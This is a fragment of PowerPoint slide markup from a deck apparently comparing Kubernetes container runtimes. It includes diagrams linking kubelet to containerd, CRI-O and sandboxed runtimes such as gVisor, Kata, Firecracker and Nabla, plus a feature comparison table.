            <a:ext cx="3282533" cy="8597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49C08A-115B-2842-AD59-D9C0055ECC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992" y="2921337"/>
            <a:ext cx="2447712" cy="14745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BA1B691-A7B0-E346-9931-07FFE3EA99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2344" y="4649371"/>
            <a:ext cx="1255833" cy="8414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A330B41-F114-0F4A-B136-9E4D54F484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13573" y="5313877"/>
            <a:ext cx="4364853" cy="9673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4311CB5-B114-F741-9C5D-9D0B042566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85640" y="5461686"/>
            <a:ext cx="1760305" cy="8195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9995533-7FE5-6640-BD1B-2F258CFC49C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15622" y="3880114"/>
            <a:ext cx="4760754" cy="103149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583D3AC-D1DA-C54D-AD1A-1505C542667E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134489" y="6445619"/>
            <a:ext cx="907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5"/>
              </a:rPr>
              <a:t>https://landscape.cncf.io/category=container-runtime&amp;format=card-mode&amp;grouping=category</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN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D295030-E545-8144-B6EC-77132A52C61E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Runtime</a:t>
            </a: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Landscape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412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7AED57B-3394-7E40-844D-1E1E2694BB97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="66" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2719843" y="5594678"/>
            <a:ext cx="5834413" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="3D7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98B6722-4ACF-564A-A86D-502FEF292006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2719843" y="3932425"/>
            <a:ext cx="6025407" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="3D7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235C49E-E71D-2C49-A514-F7FFBA2987A8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700493" y="2344123"/>
            <a:ext cx="5853763" cy="6783"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="3D7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46EC17F-8A3B-1045-9217-892577BFC56C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3502228" y="3613759"/>
            <a:ext cx="1418985" cy="644859"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF0D5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cri-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>containerd</a:t>
            </a:r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66130AE-1E97-0D49-B15C-84E57E64DCEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9016671" y="3893974"/>
            <a:ext cx="1667985" cy="644859"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="88D9BE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runsc+gVisor</a:t>
            </a:r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2289F6D-8073-7143-AC82-A3FFE3E18603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1418345" y="2102427"/>
            <a:ext cx="1282148" cy="496957"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="67ABD7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kubelet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1EA6344-1A58-F24E-A47A-2235F7EE288C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3502228" y="2028475"/>
            <a:ext cx="1418985" cy="644859"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF0D5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dockershim</a:t>
            </a:r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40966F6-1FB2-6548-8612-F83A7CB1E0E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181424" y="2028475"/>
            <a:ext cx="1418985" cy="644859"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF0D5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docker</a:t>
            </a:r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C384373-CE17-BE45-A7CA-4F8B4B3925B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6860620" y="2028474"/>
            <a:ext cx="1418985" cy="644859"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF0D5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containerd</a:t>
            </a:r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A258CE4-D5A8-B744-ACE8-70367A98AAF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181423" y="3613760"/>
            <a:ext cx="1418985" cy="644859"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF0D5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containerd</a:t>
            </a:r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E56ECE3-DBF1-6C49-A030-DEF3B9AF77A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9002780" y="2155354"/>
            <a:ext cx="1084976" cy="644859"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="88D9BE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runc</a:t>
            </a:r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6BAA869-F23E-2C49-84CF-F47C22EB95B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9002780" y="3030662"/>
            <a:ext cx="1084976" cy="644859"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="88D9BE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kata-runtime</a:t>
            </a:r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1B9AD5FF-819C-1B4C-A91D-F3939B29C7EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3502227" y="5272249"/>
            <a:ext cx="1418985" cy="644859"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF0D5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CRI-O</a:t>
            </a:r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63734C94-2E64-DE45-9980-38922EE548A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1437695" y="3683946"/>
            <a:ext cx="1282148" cy="496957"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="67ABD7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kubelet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E05B38CB-DB73-4D4D-B670-A305376A24EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1437695" y="5346199"/>
            <a:ext cx="1282148" cy="496957"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="67ABD7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kubelet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FDA7892-D5D0-D84F-998A-79FBDD2781D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5195863" y="5279575"/>
            <a:ext cx="3159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io.kubernetes.cri-o.TrustedSandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>=true</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1400" dirty="0"/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1C32EE4B-6C89-F84C-99ED-EF8D44C9C020}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10087756" y="3037988"/>
            <a:ext cx="1678571" cy="644859"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="88D9BE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containerd-shim-kata-v2</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="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50213339-FDDA-E64D-B714-ED4A7EB51C69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8554256" y="1805051"/>
            <a:ext cx="381989" cy="4547755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:prstDash val="lg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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN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FF6AAF9-DD3B-A645-8AD5-E73DBFE286B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2860027" y="1805050"/>
            <a:ext cx="381989" cy="4547755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:prstDash val="lg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</a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{959605D7-7509-1C49-92AB-D8A58E8147BC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K8s Runtime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1E37744-D5FE-CD46-AF23-3CB72CEE1F78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5195862" y="5592588"/>
            <a:ext cx="3191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io.kubernetes.cri-o.TrustedSandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>=false</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1400" dirty="0"/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3F89D4A6-16DE-BD47-BDC3-A9705EAAE301}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9016672" y="4788604"/>
            <a:ext cx="1678571" cy="644859"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="88D9BE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Firecracker-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>containerd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346C5D30-5076-DA4C-9A02-654D40462ACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9016673" y="5639350"/>
            <a:ext cx="1678570" cy="644859"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="88D9BE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runnc+Nabla</a:t>
            </a:r>
            <a:endParaRPr lang="en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660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28434CC-7C50-0E4B-857A-5DB10AAC85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384876"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1063350" y="1668285"/>
          <a:ext cx="10312434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2417">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1537009704"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="869235">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1165430034"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1145826">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1616834626"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1145826">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2706099952"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1145826">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3833417878"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1145826">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3696804161"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1145826">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2955101434"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1145826">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1208384545"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1145826">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="52515617"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="878081">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CN" dirty="0"/>
                        <a:t>OCI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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CN" altLang="zh-CN" dirty="0"/>
                        <a:t>olution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OCI</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>C</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CN" dirty="0"/>
                        <a:t>ompatible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r>
                        <a:rPr lang="en-CN" dirty="0"/>
                        <a:t>edicated</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>Docker</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/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Implementation Language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Open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source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Hot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plug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Direct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access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HW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Required</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>Hypervisors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Backed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by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856457"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="614657"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r>
                        <a:rPr lang="en-CN" dirty="0"/>
                        <a:t>unc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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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Golang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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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None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Docker</a:t>
                      </a:r>
                    </a:p>
                    <a:p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637289"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="878081">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CN" dirty="0"/>
                        <a:t>g</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>V</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CN" dirty="0"/>
                        <a:t>isor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>+</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>runsc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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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Golang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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CN" dirty="0"/>
                    </a:p>
                    <a:p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</a:t>
                      </a:r>
                    </a:p>
                    <a:p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None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KVM</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CN" dirty="0"/>
                    </a:p>
                    <a:p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Google</a:t>
                      </a:r>
                    </a:p>
                    <a:p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022440"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="614657"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  <a:r>
                        <a:rPr lang="en-CN" dirty="0"/>
                        <a:t>ata</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>+</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>qemu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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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Golang,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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CN" dirty="0"/>
                    </a:p>
                    <a:p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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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KVM</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CN" dirty="0"/>
                    </a:p>
                    <a:p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Hyper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291313"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="878081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  <a:r>
                        <a:rPr lang="en-CN" dirty="0"/>
                        <a:t>irecracker</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>Firecracker-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>containerd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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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Rust,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Golang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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CN" dirty="0"/>
                    </a:p>
                    <a:p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</a:t>
                      </a:r>
                    </a:p>
                    <a:p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KVM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Amazon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905341"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="614657">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CN" dirty="0"/>
                        <a:t>Nabla</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>+</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>runnc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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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</a:t>
                      </a:r>
                    </a:p>
                    <a:p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Golang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Yes</a:t>
                      </a:r>
                    </a:p>
                    <a:p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</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CN" dirty="0"/>
                    </a:p>
                    <a:p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None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IBM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029320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BB2D9E4F-D391-2042-9B7B-C65D50AF6E35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3055442" y="1"/>
            <a:ext cx="8648878" cy="1108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OCI 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712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10768</TotalTime>
  <Words>1477</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>343</Paragraphs>
  <Slides>27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System Font Regular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Contini</dc:creator>
  <cp:lastModifiedBy>T102059</cp:lastModifiedBy>
  <cp:revision>541</cp:revision>
  <cp:lastPrinted>2020-07-19T12:09:19Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-29T21:37:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-22T12:31:42Z</dcterms:modified>
</cp:coreProperties>
</file>